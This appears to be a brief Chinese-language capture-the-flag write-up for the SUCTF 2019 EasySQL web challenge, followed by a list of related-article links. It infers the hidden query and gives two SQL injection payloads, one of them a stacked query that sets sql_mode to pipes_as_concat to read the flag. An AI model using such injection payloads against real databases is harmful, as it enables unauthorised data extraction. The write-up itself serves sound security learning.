zoukankan      html  css  js  c++  java
  • Web-[SUCTF 2019]EasySQL

    打开后显示如下:

    payload为数字时有回显,为字符串时没有回显

    看大佬的wp得知,此时的内置sql语句为sql=“select”.post[‘query’]."||flag from Flag";

    解法一

    当payload为*,1时,执行的sql语句为select *,1||flag from Flag
    相当于select 1 from Flag

    于是

    得到flag

    解法二(预期解法)

    payload为1;set sql_mode=pipes_as_concat;select 1

    此时执行的语句为

    select 1
    set sql_mode=pipes_as_concat
    select 1||flag from Flag
    

    得到flag

  • 相关阅读:
    HDU 6043
    HDU 6033
    HDU 6041
    HDU 6050
    HDU 6053
    HDU 6055
    HDU 6045
    HDU 6044
    HDU 6040
    ZUFE 1035 字符宽度编码(字符串)
  • 原文地址:https://www.cnblogs.com/1dan/p/15494444.html
Copyright © 2011-2022 走看看